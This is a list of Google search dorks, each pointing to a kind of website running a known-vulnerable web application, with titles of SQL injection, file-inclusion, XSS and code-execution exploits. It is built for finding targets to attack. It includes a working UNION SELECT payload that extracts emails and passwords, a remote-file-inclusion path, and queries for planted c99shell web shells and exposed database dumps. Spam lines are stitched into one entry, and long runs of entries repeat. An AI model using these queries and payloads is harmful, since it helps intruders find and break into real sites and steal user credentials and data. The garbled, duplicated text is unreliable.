Link: phpBB Plus <= 1.53 (phpbb_root_path) Remote File Inclusion Vuln
--------------------------------------------------------------------------------
Dork:
1) intitle:"styles demo" "Powered by phpBB"
2) inurl:/styles_demo/index.php
Link: StylesDemo Mod for phpbb 2.0.xx Multiple Vulnerabilites
--------------------------------------------------------------------------------
Dork: intext:"R?is?vec KwsPHP"
Link: KwsPHP version 1.0 suffers from a remote SQL injection vulnerability the stats module.
--------------------------------------------------------------------------------
Dork: inurl:"/jblog/index.php"
Link: JBlog 1.0 (index.php id) Remote SQL Injection Exploit
--------------------------------------------------------------------------------
Dork: inurl:"/webquest/soporte_derecha_w.php"
Link: PHP Webquest <= 2.5 (id_actividad) Remote SQL Injection Exploit
--------------------------------------------------------------------------------
Dork: "Powered by GForge"
Link: GForge < 4.6b2 (skill_delete) Remote SQL Injection Vulnerability
--------------------------------------------------------------------------------
Dork: "Powered by TinyWebGallery"
Link: TinyWebGallery Multiple Cross-Site Scripting Vulnerabilities
--------------------------------------------------------------------------------
Dorks: inurl:"/customer/product.php?" X-cart
Author: hip
Link: X-Cart <= ? Multiple Remote File Inclusion Vulnerabilities
--------------------------------------------------------------------------------
Dork: inurl:/xcart/home.php
Link: X-Cart <= ? Multiple Remote File Inclusion Vulnerabilities
--------------------------------------------------------------------------------
Dorks:
1) "Powered by phpmytourney"
2) inurlCant See Imageshpmytourney
3) inurlCant See Images_signup.php
Author: civi
Link: phpMytourney (functions_file) Remote File Inclusion Vulnerability
--------------------------------------------------------------------------------
Dork: intext:"anyInventory 1.9" intitle:anyInventory
Link: AnyInventory => 1.9.1 Remote file inclusion
--------------------------------------------------------------------------------
Dork: intitle:"Calendar: A JSP APPLICATION"
Link: Apache Tomcat version 4.1.31 XSS Vuln.
--------------------------------------------------------------------------------
Dork: intext:" Powered by myBloggie"
Link: MyBloggie Trackback.PHP Multiple SQL Injection Vulnerabilities
--------------------------------------------------------------------------------
Dork: intext:"Powered by Claroline * 2001"
Link: Claroline Local File Include and Cross-Site Scripting Vulnerabilities
--------------------------------------------------------------------------------
Dork: intitle:"Webboard Powered by : 212cafe.com"
Link: 212cafe Webboard Read.PHP SQL Injection Vulnerability
--------------------------------------------------------------------------------
Dork: "Powered by Weblogicnet"
Link: Weblogicnet (files_dir) Remote File Inclusion
--------------------------------------------------------------------------------
Dork: inurl:index.php?option=com_content intitle:"Joomla* powered Site"
Link: Joomla! 1.5 Beta1/Beta2 SQL Injection Exploit
--------------------------------------------------------------------------------
Dork: inurl:Tiki-Remind_Password.PHP
Link: Tikiwiki Tiki-Remind_Password.PHP Cross-Site Scripting Vulnerability
--------------------------------------------------------------------------------
Dork: inurl:category.php?manufacturer_id=
Link: CKGold Shopping Cart 2.0 (category.php) Blind SQL Injection Exploit
--------------------------------------------------------------------------------
Dork: inurl:/phpBB2/links.php OR inurl:/forum/links.php "Powered by phpBB"
Link: phpBB <= 2.0.22 - Links MOD <= v1.2.2 Remote SQL Injection Exploit
--------------------------------------------------------------------------------
Dork: intext:"Powered by DeskPRO" "Login / Create" OR "Login to Your Account"
Link: 1) DeskPRO Admin Panel Multiple HTML Injection Vulnerabilities
Link: 2) DeskPRO Admin Panel Multiple HTML Injection Vulnerabilities
--------------------------------------------------------------------------------
Dork: "ABC eStore * Zakkis Tech"
Link: ABC estore 3.0 (cat_id) Blind SQL Injection
--------------------------------------------------------------------------------
Dork: "ABC eStore * Zakkis Tech"
Link: ABC estore 3.0 (cat_id) Blind SQL Injection
--------------------------------------------------------------------------------
Dork: "Powered by xGB 2.0"
Link: xGB 2.0 (xGB.php) Remote Permission Bypass Vulnerability
--------------------------------------------------------------------------------
Dork: inurl:vwar/news.php
Author: civi
Link: VWar <= v1.5.0 R15 (mvcw.php) Remote File Inclusion
--------------------------------------------------------------------------------
Dork: "Powered by 'SunShop Shopping Cart'"
Link: SunShop v4.0 RC 6 (search) Blind SQL Injection
--------------------------------------------------------------------------------
Dork: intext:"propuls?ar SPIP"
Link: SPIP Inc-Calcul.PHP3 Remote File Include Vulnerability
--------------------------------------------------------------------------------
Dork:
1) "Powered by Olate Download" inurl:download.php
2) intitle:"Olate Download - Error"
Link: Olate Download Download.PHP Multiple SQL Injection Vulnerabilities
--------------------------------------------------------------------------------
Dork: "Powered by LiteCommerce: ecommerce software"
Link: LiteCommerce Multiple SQL Injection Vulnerabilities
--------------------------------------------------------------------------------
Dork: intitle:"Powered By phUploader"
Link: phUploader phUploader.PHP Arbitrary File Upload Vulnerability
--------------------------------------------------------------------------------
Dork: "Powered by Squirrelcart * PHP Shopping Cart Software"
Link: Squirrelcart Popup_Window.PHP Remote File Include Vulnerability
--------------------------------------------------------------------------------
Dork: intext:"Dalai Forum v1*"
Link: Dalai Forum Forumreply.PHP Local File Include Vulnerability
--------------------------------------------------------------------------------
Dork: intext:"Powered by GetMyOwnArcade.com."
Link: GetMyOwnArcade Search.PHP SQL Injection Vulnerability
--------------------------------------------------------------------------------
Dork: intext:"Powered by EZPhotoSales" intitle:"Online Viewing"
Link: EZPhotoSales Multiple Input Validation Vulnerabilities
--------------------------------------------------------------------------------
Dork: intext:"Powered by Article Dashboard"
Link: Article Dashboard Multiple Input Validation Vulnerabilities
--------------------------------------------------------------------------------
Dork: intext:"Powered by DeskPRO" inurl: login.php
Link: DeskPRO Admin Panel Multiple HTML Injection Vulnerabilities
--------------------------------------------------------------------------------
Dork: inurl:"/go/_files/?file="
Author: dun
Link: SOTEeSKLEP Remote File Disclosure Vulnerability
--------------------------------------------------------------------------------
Dork:
1) intext:"Created by phpSysInfo" inurl: index.php
2) intitle:"System Information" intext:"Created by phpSysInfo"
Link: phpSysInfo Index.php Cross-Site Scripting Vulnerability
--------------------------------------------------------------------------------
Dork: inurl:"/detail.asp?iPro" intext:"Year: *. Date:"
Link: AutoDealer Detail.ASP SQL Injection Vulnerability
--------------------------------------------------------------------------------
Dork:
1) intitle:"- LinPHA" inurl:new_images.php
2) intext:"Powered by LinPHA"
Link: LinPHA <= 1.3.1 (new_images.php) Remote Blind SQL Injection
--------------------------------------------------------------------------------
Dork:
1) intext:"Powered by Philboard" intitle:"Philboard"
2) inurlCant See Imageshilboard_forum.asp -sql
Link: Metyus Forum Portal v1.0 philboard_forum.asp (id) Sql Injection
--------------------------------------------------------------------------------
Dork: intitle:xoops inurl:/modules/xfsection/
Author: civi
Link: XOOPS Module XFsection Remote File Inclusion
--------------------------------------------------------------------------------
Dork:
1) intext:"Powered by Nukedit"
2) "Powered by Nukedit" inurl:"login.asp"
Link: Nukedit Login.ASP Cross-Site Scripting Vulnerability
--------------------------------------------------------------------------------
Dork: intext:"Built with FORMfields" inurl:/adMan/
Link: FORMfield Secure Login.PHP Multiple Cross-Site Scripting Vulnerabilities
--------------------------------------------------------------------------------
Dork: intitle:"The Text Ad Marketplace"
Link: AlstraSoft Text Ads Enterprise Multiple Cross-Site Scripting Vulnerabilities
--------------------------------------------------------------------------------
Dork: intext:"powered by philboard" -SQL
Link: W1L3D4 Philboard v0.3 XSS Vulnerability
--------------------------------------------------------------------------------
Dork:
1) intext:"Powered by Webspell"
2) intitle:"webSPELL v4.0"
Link: Webspell 4.x Local File Inclusion (Win)
--------------------------------------------------------------------------------
Dork: intitle:"Confixx Professional" intext:Login"
Link: Confixx <= PRO 3.3.1 Remote File Inclusion Vulnerability
--------------------------------------------------------------------------------
Dork: intext:"Powered by UseBB"
Link: UseBB version: 1.0.7 Cross Site Scripting (XSS)
--------------------------------------------------------------------------------
Dork:
1) inurl:"us/index.php?option=com_remository
2) intitle:"* ReMOSitory"
Author: xdfsd45oi
Link: Mambo Remository Component <= 3.25 Remote Include Vulnerability
--------------------------------------------------------------------------------
Dork: "Powered By Vivvo CMS"
Link: Vivvo CMS <= 3.4 (index.php) Remote BLIND SQL Injection Exploit
--------------------------------------------------------------------------------
Dork: allinurl:bemarket
Author: mozi
RFI Exploit:
/bemarket/postscript/postscript.php?p_mode=evilscipt
--------------------------------------------------------------------------------
Dork: intitle:"dig up the stats"
Link: Traffic Stats SQL Injection Vulnerbility
--------------------------------------------------------------------------------
Dork:
1) inurlCant See Imagesafiledb.php?action=search
2) intext:"Powered by paFileDB" intitleCant See ImagesaFileDB
Link: paFileDB 3.6 (search.php) Remote SQL Injection Vulnerability
--------------------------------------------------------------------------------
Dork: allinurl:directory.php?ax=list
Author: proxyakabran
SQL Injection:
/directory.php?ax=list&sub=1&cat_id=-1/**/UNION/**/SELECT/**/1,2,3,4,concat(0x2D2D3E, email,0x3a,password),6,7,8,9,10,0x223E3C212D2D,12, 13/**/from/**/links/*
--------------------------------------------------------------------------------
Dork: intitle:"SiteScape Forum Login"
Link: SiteScape Forum Multiple Unspecified Cross-Site Scripting Vulnerabilities
--------------------------------------------------------------------------------
Dork: inurl:"mimic2.cgi"
Link: Mimicboard2 Mimic2.Dat Unauthorized Access Vulnerability
--------------------------------------------------------------------------------
Dork: intext:"Powered by Calendar Express 2"
Link: Calendar Express Multiple SQL Injection Vulnerabilities
--------------------------------------------------------------------------------
Dork: intext:"Powered by Discus" inurl:/discus/
Link: DiscusWare Discus Error Message Cross-Site Scripting Vulnerability
--------------------------------------------------------------------------------
Dork: intext:"Powered by WebMatic" (only 99 results)
Link: Webmatic Multiple SQL Injection Vulnerabilities
--------------------------------------------------------------------------------
Dork: intext:"Powered by MKPortal"
Link: MkPortal Multiple SQL Injection Vulnerabilities
--------------------------------------------------------------------------------
Dork: inurl:mailmachine.cgi intext:"Mail Machine v3" (only 11 results)
Link: Mail Machine Local File Include Exploit
--------------------------------------------------------------------------------
Dork: inurlCant See Imagesictionary.aspx intitleCant See Imagesictionary.aspx
Link: HomestayFinder's Dictionary.aspx XSS vuln.
--------------------------------------------------------------------------------
Dork: ":80" ":8080" -intext:a* filetype:txt
Author: florence
Finds lists of proxies.
--------------------------------------------------------------------------------
Dork: intitle:"Aigaion * Please login" *(only 6 found)
Link: Aigaion <= 1.3.3 SQL Injection Exploit
--------------------------------------------------------------------------------
Dork: inurl:htmltonuke.php?
Link: PHP-Nuke RFI Exploit
--------------------------------------------------------------------------------
Dork: "Powered by PHP Director" inurl:videos.php
Link: PHP Director Videos.PHP SQL Injection Vulnerability
--------------------------------------------------------------------------------
Dork: intitle:"phpwcms ** web based content management system"
Link: PHPWCMS Multiple Remote File Include Vulnerabilities
--------------------------------------------------------------------------------
Dork: intext:"powered by easybe." (only 6 results)
Link: Easybe 1-2-3 Music Store Process.PHP Script SQL Injection Vulnerability
--------------------------------------------------------------------------------
Dork: intext:"phpBook Ver" inurl:guestbook.php intitle:"Guestbook"
Link: NETonE PHPBook Guestbook.PHP Cross Site Scripting Vulnerability
--------------------------------------------------------------------------------
Dork: intext:"Login to Webmin" inurl:10000
Link: Webmin Pam_Login.CGI Multiple Unspecified Cross-Site Scripting Vulnerabilities
--------------------------------------------------------------------------------
Dork: inurl:"spellchecktext.php" OR inurl:"spellcheckwindow.php" (only 10 results)
Link: SPHPell Multiple Remote File Include Vulnerabilities
--------------------------------------------------------------------------------
Dork:
1) inurl:index.php?name=PNphpBB2 inurl:viewforum
2) intext:"Powered by PNphpBB2"
Link: PNphpBB2 "viewforum.php" SQL Injection Blind Password Hash Fishing Exploit
--------------------------------------------------------------------------------
Dork: intext:"Powered by EQdkp" inurl:"login.php"
Link: EQDKP Login.PHP Arbitrary Variable Overwrite Vulnerability
--------------------------------------------------------------------------------
Dork: "Powered by Wheatblog"
Link: Wheatblog Login SQL Injection Vulnerability
--------------------------------------------------------------------------------
Dork: intitle:"phpEventCalendar: Event Display"
Link: phpEventCalendar <= v0.2.3 SQL Injection Exploit
--------------------------------------------------------------------------------
Dork: inurl:forum.php "Powered by VBZooM"
Link: vbzoom 1.x (forum.php MainID) Remote SQL Injection Vulnerabilities
--------------------------------------------------------------------------------
Dork: intitle:c99shell filetypeCant See Imageshp
--------------------------------------------------------------------------------
Dork: intitle:"WebChat" inurl:"/webchat/login.php
Link: WebChat 0.78 (login.php rid) Remote SQL Injection Vulnerability
--------------------------------------------------------------------------------
Dork: intext:"powered by e107" inurl:signup.php
Link: E107 Signup.PHP Arbitrary File Upload Vulnerability
--------------------------------------------------------------------------------
Dork: intitle:"phpTrafficA ** web statistics"
Link: phpTrafficA <= 1.4.2 (pageid) Remote SQL Injection Vulnerability
--------------------------------------------------------------------------------
Dork: intitle:"Welcome to LMS" intext:"Please login"
Link: LMS - LAN Management System 1.9.6 - RFI
--------------------------------------------------------------------------------
Dork: intitle:"Blackboard Academic Suite"
Link: Blackboard Products Multiple HTML Injection Vulnerabilities
--------------------------------------------------------------------------------
Dork: intitle:"Blackboard Learning System" inurl:/login/
Link: Blackboard Products Multiple HTML Injection Vulnerabilities
--------------------------------------------------------------------------------
Dork: intext:"Powered by WMS-CMS" inurl:default.asp
Link: WMSCMS Multiple Cross Site Scripting Vulnerabilities
--------------------------------------------------------------------------------
Dork: inurl:/xmlrp.php intext:"Warning:" intext:"wp-config.php"
Link: Wordpress 2.2 (xmlrpc.php) Remote SQL Injection Exploit
--------------------------------------------------------------------------------
Dork: intext:"Software PBLang" inurl:"login.php "intitle:log in"
Link: PBLang <= 4.67.16.a Remote Code Execution Exploit
--------------------------------------------------------------------------------
Dork: intext:Powered by EQdkp inurl:listmembers.php
Link: EQdkp <= 1.3.2 SQL Injection Exploit
--------------------------------------------------------------------------------
Dork: intitle:sendcard - a PHP postcard script using a database to store the cards"
Link: Sendcard <= 3.4.1 Remote Code Execution Exploit
--------------------------------------------------------------------------------
Dork: inurl:/cpCommerce/category.php
Link: cpCommerce <= 1.1.0 (category.php id_category) Remote SQL Injection Exploit
--------------------------------------------------------------------------------
Dork: intext:"Powered by Particle Gallery"
Link: Particle Gallery Search.PHP Cross-Site Scripting Vulnerability
--------------------------------------------------------------------------------
Dork: intext:"Powered by Particle Blogger"
Link: Particle Blogger Archives.PHP SQL Injection Vulnerability
--------------------------------------------------------------------------------
Dork: OTRS :: Login intext:"Powered by OTRS"
Link: OTRS Index.PL Cross-Site Scripting Vulnerability
--------------------------------------------------------------------------------
Dork: intext:"Vistered Little Theme by"
Link: Vistered Little 1.6a Remote File Disclosure Vulnerability
--------------------------------------------------------------------------------
Dork: intext:Powered by phpCodeur © 2002–2006 | Wanewsletter
Link: WAnewsletter-2.1.3 (newsletter.php) RFI Vul
--------------------------------------------------------------------------------
Dork: intitleCant See ImageshpPgAdmin - Login
Link: ********** code Injection in phpPgAdmin
--------------------------------------------------------------------------------
Dork: intext:SquirrelMail Login
Link: SquirrelMail Multiple Cross Site Scripting Vulnerabilities
--------------------------------------------------------------------------------
Dork: intext:Powered by Geeklog inurl:album.php
Link: Media Gallery =>v1.4 Remote file inclusion
--------------------------------------------------------------------------------
Dork: Powered By Pligg intext:Beta 9 / Login
Link: Pligg Reset Forgotten Password Security Bypass Vulnerability
--------------------------------------------------------------------------------
Dork: mailto:*@aol.com
Helps find usernames on a certain domain, replace aol.com
--------------------------------------------------------------------------------
Dork: intext:GNUTURK PORTAL inurl:Mods.PHP
Link: GNUTurk Mods.PHP Cross Site Scripting Vulnerability
truyen sex
wap sex
anh sex
hinh sex
Link: phpMyChat v0.14.5 Multiple Vulnerabilities
--------------------------------------------------------------------------------
Dork: "powered by talkback"
Author: civi
Link: TalkBack 2.2.7 Remote File Include Vulnerability
--------------------------------------------------------------------------------
Dork: "Total members:" AND "Paid out:" AND "Redeemed:"
Author: fuzion
Link: Amber Script 1.0 (show_content.php id) Local File Inclusion Vulnerability
--------------------------------------------------------------------------------
Dork: inurl:Commence intitle:"Commence Conference System"
Author: fuzion
Link: IAPR COMMENCE 1.3 Multiple Remote File Inclusion Vulnerability
--------------------------------------------------------------------------------
Dork: inurl:"/hp/device/this.LCDispatcher"
--------------------------------------------------------------------------------
Dork: intitle:"Broadband Router Status"
--------------------------------------------------------------------------------
Dork: "Powered by SHP"
Author: civi
Link: Sciurus Hosting Panel Code Inject Exploit
--------------------------------------------------------------------------------
Dork: "Powered by icebb"
Author: civi
Link: IceBB 1.0-rc6 - Database Authentication Details Exploit
--------------------------------------------------------------------------------
Dork: "Powered by ExoPHPDesk v1.2.1"
Link: ExoPHPDesk Index.PHP Multiple Input Validation Vulnerabilities
--------------------------------------------------------------------------------
Dork: "Powered by GuppY"
Link: GuppY Error.PHP Remote File Include and Command Execution Vulnerability
--------------------------------------------------------------------------------
Dork: "MySQL Administrator dump" filetype:sql
--------------------------------------------------------------------------------
Dork: intitle:"Helios Calendar Event Management System"
Author: Maximiliano Soler
Link: Helios Calendar <=1.2.1 Beta (XSS) Multiple Remote Vulnerabilities
--------------------------------------------------------------------------------
Dork: intext:Powered by UebiMiau! intitle:uebimiau inurl:/webmail/index.php?lid=
Author: Maximiliano Soler
Link: UebiMiau <=2.7.x (XSS) Multiple Remote Vulnerabilities
--------------------------------------------------------------------------------
Dork: intext:"Powered by MailBee WebMail"
Author: Maximiliano Soler
Link: MailBee WebMail Pro <=3.4 (XSS) Multiple Remote Vulnerabilities
--------------------------------------------------------------------------------
Dork: intext:"Powered by SocketKB version"
Author: Maximiliano Soler
Link: SocketKB <=1.1.5 (XSS) Multiple Remote Vulnerabilities
--------------------------------------------------------------------------------
Dork: inurl:"/info.php?reason=link" intitle:"BlaB!"
Author: Maximiliano Soler
Link: BlaB! Chat < 3.3 (XSS) Multiple Remote Vulnerabilities
--------------------------------------------------------------------------------
Dork: inurl:"setup-config.php" intitle:"WordPress * Setup"
--------------------------------------------------------------------------------
Dork: intitle:"Micro Login System" inurl:login.php
Link: Micro Login System v1.0 Password Disclosure
--------------------------------------------------------------------------------
Dork: inurl:"efileman.cgi"
Link: eFileman Remote File Upload Vulnerability
--------------------------------------------------------------------------------
Dork: intext:"MySQL-Dump" "Host: localhost" filetype:sql
--------------------------------------------------------------------------------
Dork: intext:"PostgreSQL database dump" filetype:sql
--------------------------------------------------------------------------------
Dork: intext:"phpBB Backup Script" filetype:sql
--------------------------------------------------------------------------------
Dork: intext:"phpMyAdmin MySQL-Dump" filetype:sql
--------------------------------------------------------------------------------
Dork: "Powered by ReloadCMS 1.2.5"
Link: ReloadCMS Index.PHP Local File Include Vulnerability
--------------------------------------------------------------------------------
Dork: intitle:"Index of" intext:"LiteSpeed Web Server at"
Link: LiteSpeed Remote Mime Type Injection
--------------------------------------------------------------------------------
Dork: intitle:"SiteBar" inurl:command
Link: SiteBar Command.PHP Cross-Site Scripting Vulnerability
--------------------------------------------------------------------------------
Dork: "Powered by rnote" inurl:"rnote.php"
Link: rNote rnote.PHP Multiple Cross Site Scripting Vulnerabilities
--------------------------------------------------------------------------------
Dork: CMS von artmedic webdesign
Author: iNs
Link: artmedic CMS Local File Inclusion
--------------------------------------------------------------------------------
Dork: com_wmtrssreader
Author: civi
Link: wmtrssreader joomla component 1.0 Remote File Include Vulnerability
--------------------------------------------------------------------------------
Dork: com_swmenufree
Author: civi
Link: Joomla! swMenuFree 4.6 Component Remote File Include
--------------------------------------------------------------------------------
Dork: com_mambocredits
Author: civi
Link: com_mambocredits Remote File Incluison
--------------------------------------------------------------------------------
Dork: "Powered by Tikiwiki"
Author: civi
Link: TikiWiki 1.9.8 Remote PHP Injection Vulnerability
--------------------------------------------------------------------------------
Dork: "Powered by lightblog"
Author: civi
Link: LightBlog 8.4.1.1 Remote Code Execution Exploit
--------------------------------------------------------------------------------
Dork: "Powered by Cart32" inurl:cart32.exe -Demo
Link: Cart32 GetImage Arbitrary File Download Vulnerability
--------------------------------------------------------------------------------
Dork: "Powered by DRBGuestbook"
Link: DRBGuestbook Remote XSS Vulnerability
--------------------------------------------------------------------------------
Dork: "Powered by actsite"
Author: civi
Link: actSite v1.991 Beta (base.php) Remote File Inclusion
--------------------------------------------------------------------------------
Dork: "Powered by MDPro"
Link: MDPro 1.0.76 Remote SQL Injection Exploit
--------------------------------------------------------------------------------
Dork: "Powered by mxBB"
Link: mxBB Module mx_glance 2.3.3 Remote File Include Vulnerability
--------------------------------------------------------------------------------
Dork:
1) "Powered by phpBB" inurl:"faq.php?mode=openid"
2) "Powered by phpBB" openid
Author: salentinohack
Link: phpBB Mod OpenID 0.2.0 BBStore.php Remote File Inclusion Vuln
--------------------------------------------------------------------------------
Dork: "integramod nederland(s)"
Author: civi
Link: IntegraMOD Nederland 1.4.2 Remote File Inclusion Vulnerability
--------------------------------------------------------------------------------
Dork: "Powered by ActiveKB Knowledgebase Software"
Author: salentinohack
Link: ActiveKB Knowledgebase 2.? (catId) Remote SQL Injection Vulnerability
--------------------------------------------------------------------------------
Dork:
1) "Powered by Nuke-Evolution" intitle:NukeSentinel
2) inurl:/modules.php?name=NukeSentinel
Link: NukeSentinel 2.5.05 (nsbypass.php) Blind SQL Injection Exploit
--------------------------------------------------------------------------------
Dork:
1) "Powered by Xcms"
2) inurl:"/index.php?lng=it" "Amministrazione sito"
Link: XCMS Arbitrary Command Execution Vuln
--------------------------------------------------------------------------------
Dork: "Powered by phpBB XS" inurlCant See Imagesrofile.php
Link: phpBB XS Profile.PHP HTML Injection Vulnerability
--------------------------------------------------------------------------------
Dork: "Powered by SimplePHPBlog"
Link: SimplePHPBlog img_upload_cgi.php Arbitrary File Upload Vulnerability
--------------------------------------------------------------------------------
Dork: "Powered by PhpWebGallery" inurlCant See Imagesicture.php
Link: PhpWebGallery Picture.PHP HTML Injection Vulnerability
--------------------------------------------------------------------------------
Dork: "Powered by Phormer"
Link: Phormer Index.PHP Multiple Cross-Site Scripting Vulnerabilities
--------------------------------------------------------------------------------
Dork:
1) "Powered by iziContents"
Author: civi
Link: iziContents <= RC6 (RFI/LFI) Multiple Remote Vulnerabilities
--------------------------------------------------------------------------------
Dork:
1) "Powered by phpBB2 Plus"
2) inurl:"/phpBBplus/*.php" filetypeCant See Imageshp
Link: phpBB Plus <= 1.53 (phpbb_root_path) Remote File Inclusion Vuln
--------------------------------------------------------------------------------
Dork:
1) intitle:"styles demo" "Powered by phpBB"
2) inurl:/styles_demo/index.php
Link: StylesDemo Mod for phpbb 2.0.xx Multiple Vulnerabilites
--------------------------------------------------------------------------------
Dork: intext:"R?is?vec KwsPHP"
Link: KwsPHP version 1.0 suffers from a remote SQL injection vulnerability the stats module.
--------------------------------------------------------------------------------
Dork: inurl:"/jblog/index.php"
Link: JBlog 1.0 (index.php id) Remote SQL Injection Exploit
--------------------------------------------------------------------------------
Dork: inurl:"/webquest/soporte_derecha_w.php"
Link: PHP Webquest <= 2.5 (id_actividad) Remote SQL Injection Exploit
--------------------------------------------------------------------------------
Dork: "Powered by GForge"
Link: GForge < 4.6b2 (skill_delete) Remote SQL Injection Vulnerability
--------------------------------------------------------------------------------
Dork: "Powered by TinyWebGallery"
Link: TinyWebGallery Multiple Cross-Site Scripting Vulnerabilities
--------------------------------------------------------------------------------
Dorks: inurl:"/customer/product.php?" X-cart
Author: hip
Link: X-Cart <= ? Multiple Remote File Inclusion Vulnerabilities
--------------------------------------------------------------------------------
Dork: inurl:/xcart/home.php
Link: X-Cart <= ? Multiple Remote File Inclusion Vulnerabilities
--------------------------------------------------------------------------------
Dorks:
1) "Powered by phpmytourney"
2) inurlCant See Imageshpmytourney
3) inurlCant See Images_signup.php
Author: civi
Link: phpMytourney (functions_file) Remote File Inclusion Vulnerability
--------------------------------------------------------------------------------
Dork: intext:"anyInventory 1.9" intitle:anyInventory
Link: AnyInventory => 1.9.1 Remote file inclusion
--------------------------------------------------------------------------------
Dork: intitle:"Calendar: A JSP APPLICATION"
Link: Apache Tomcat version 4.1.31 XSS Vuln.
--------------------------------------------------------------------------------
Dork: intext:" Powered by myBloggie"
Link: MyBloggie Trackback.PHP Multiple SQL Injection Vulnerabilities
--------------------------------------------------------------------------------
Dork: intext:"Powered by Claroline * 2001"
Link: Claroline Local File Include and Cross-Site Scripting Vulnerabilities
--------------------------------------------------------------------------------
Dork: intitle:"Webboard Powered by : 212cafe.com"
Link: 212cafe Webboard Read.PHP SQL Injection Vulnerability
--------------------------------------------------------------------------------
Dork: "Powered by Weblogicnet"
Link: Weblogicnet (files_dir) Remote File Inclusion
--------------------------------------------------------------------------------
Dork: inurl:index.php?option=com_content intitle:"Joomla* powered Site"
Link: Joomla! 1.5 Beta1/Beta2 SQL Injection Exploit
--------------------------------------------------------------------------------
Dork: inurl:Tiki-Remind_Password.PHP
Link: Tikiwiki Tiki-Remind_Password.PHP Cross-Site Scripting Vulnerability
--------------------------------------------------------------------------------
Dork: inurl:category.php?manufacturer_id=
Link: CKGold Shopping Cart 2.0 (category.php) Blind SQL Injection Exploit
--------------------------------------------------------------------------------
Dork: inurl:/phpBB2/links.php OR inurl:/forum/links.php "Powered by phpBB"
Link: phpBB <= 2.0.22 - Links MOD <= v1.2.2 Remote SQL Injection Exploit
--------------------------------------------------------------------------------
Dork: intext:"Powered by DeskPRO" "Login / Create" OR "Login to Your Account"
Link: 1) DeskPRO Admin Panel Multiple HTML Injection Vulnerabilities
Link: 2) DeskPRO Admin Panel Multiple HTML Injection Vulnerabilities
--------------------------------------------------------------------------------
Dork: "ABC eStore * Zakkis Tech"
Link: ABC estore 3.0 (cat_id) Blind SQL Injection
--------------------------------------------------------------------------------
Dork: "ABC eStore * Zakkis Tech"
Link: ABC estore 3.0 (cat_id) Blind SQL Injection
--------------------------------------------------------------------------------
Dork: "Powered by xGB 2.0"
Link: xGB 2.0 (xGB.php) Remote Permission Bypass Vulnerability
--------------------------------------------------------------------------------
Dork: inurl:vwar/news.php
Author: civi
Link: VWar <= v1.5.0 R15 (mvcw.php) Remote File Inclusion
--------------------------------------------------------------------------------
Dork: "Powered by 'SunShop Shopping Cart'"
Link: SunShop v4.0 RC 6 (search) Blind SQL Injection
--------------------------------------------------------------------------------
Dork: intext:"propuls?ar SPIP"
Link: SPIP Inc-Calcul.PHP3 Remote File Include Vulnerability
--------------------------------------------------------------------------------
Dork:
1) "Powered by Olate Download" inurl:download.php
2) intitle:"Olate Download - Error"
Link: Olate Download Download.PHP Multiple SQL Injection Vulnerabilities
--------------------------------------------------------------------------------
Dork: "Powered by LiteCommerce: ecommerce software"
Link: LiteCommerce Multiple SQL Injection Vulnerabilities
--------------------------------------------------------------------------------
Dork: intitle:"Powered By phUploader"
Link: phUploader phUploader.PHP Arbitrary File Upload Vulnerability
--------------------------------------------------------------------------------
Dork: "Powered by Squirrelcart * PHP Shopping Cart Software"
Link: Squirrelcart Popup_Window.PHP Remote File Include Vulnerability
--------------------------------------------------------------------------------
Dork: intext:"Dalai Forum v1*"
Link: Dalai Forum Forumreply.PHP Local File Include Vulnerability
--------------------------------------------------------------------------------
Dork: intext:"Powered by GetMyOwnArcade.com."
Link: GetMyOwnArcade Search.PHP SQL Injection Vulnerability
--------------------------------------------------------------------------------
Dork: intext:"Powered by EZPhotoSales" intitle:"Online Viewing"
Link: EZPhotoSales Multiple Input Validation Vulnerabilities
--------------------------------------------------------------------------------
Dork: intext:"Powered by Article Dashboard"
Link: Article Dashboard Multiple Input Validation Vulnerabilities
--------------------------------------------------------------------------------
Dork: intext:"Powered by DeskPRO" inurl: login.php
Link: DeskPRO Admin Panel Multiple HTML Injection Vulnerabilities
--------------------------------------------------------------------------------
Dork: inurl:"/go/_files/?file="
Author: dun
Link: SOTEeSKLEP Remote File Disclosure Vulnerability
--------------------------------------------------------------------------------
Dork:
1) intext:"Created by phpSysInfo" inurl: index.php
2) intitle:"System Information" intext:"Created by phpSysInfo"
Link: phpSysInfo Index.php Cross-Site Scripting Vulnerability
--------------------------------------------------------------------------------
Dork: inurl:"/detail.asp?iPro" intext:"Year: *. Date:"
Link: AutoDealer Detail.ASP SQL Injection Vulnerability
--------------------------------------------------------------------------------
Dork:
1) intitle:"- LinPHA" inurl:new_images.php
2) intext:"Powered by LinPHA"
Link: LinPHA <= 1.3.1 (new_images.php) Remote Blind SQL Injection
--------------------------------------------------------------------------------
Dork:
1) intext:"Powered by Philboard" intitle:"Philboard"
2) inurlCant See Imageshilboard_forum.asp -sql
Link: Metyus Forum Portal v1.0 philboard_forum.asp (id) Sql Injection
--------------------------------------------------------------------------------
Dork: intitle:xoops inurl:/modules/xfsection/
Author: civi
Link: XOOPS Module XFsection Remote File Inclusion
--------------------------------------------------------------------------------
Dork:
1) intext:"Powered by Nukedit"
2) "Powered by Nukedit" inurl:"login.asp"
Link: Nukedit Login.ASP Cross-Site Scripting Vulnerability
--------------------------------------------------------------------------------
Dork: intext:"Built with FORMfields" inurl:/adMan/
Link: FORMfield Secure Login.PHP Multiple Cross-Site Scripting Vulnerabilities
--------------------------------------------------------------------------------
Dork: intitle:"The Text Ad Marketplace"
Link: AlstraSoft Text Ads Enterprise Multiple Cross-Site Scripting Vulnerabilities
--------------------------------------------------------------------------------
Dork: intext:"powered by philboard" -SQL
Link: W1L3D4 Philboard v0.3 XSS Vulnerability
--------------------------------------------------------------------------------
Dork:
1) intext:"Powered by Webspell"
2) intitle:"webSPELL v4.0"
Link: Webspell 4.x Local File Inclusion (Win)
--------------------------------------------------------------------------------
Dork: intitle:"Confixx Professional" intext:Login"
Link: Confixx <= PRO 3.3.1 Remote File Inclusion Vulnerability
--------------------------------------------------------------------------------
Dork: intext:"Powered by UseBB"
Link: UseBB version: 1.0.7 Cross Site Scripting (XSS)
--------------------------------------------------------------------------------
Dork:
1) inurl:"us/index.php?option=com_remository
2) intitle:"* ReMOSitory"
Author: xdfsd45oi
Link: Mambo Remository Component <= 3.25 Remote Include Vulnerability
--------------------------------------------------------------------------------
Dork: "Powered By Vivvo CMS"
Link: Vivvo CMS <= 3.4 (index.php) Remote BLIND SQL Injection Exploit
--------------------------------------------------------------------------------
Dork: allinurl:bemarket
Author: mozi
RFI Exploit:
/bemarket/postscript/postscript.php?p_mode=evilscipt
--------------------------------------------------------------------------------
Dork: intitle:"dig up the stats"
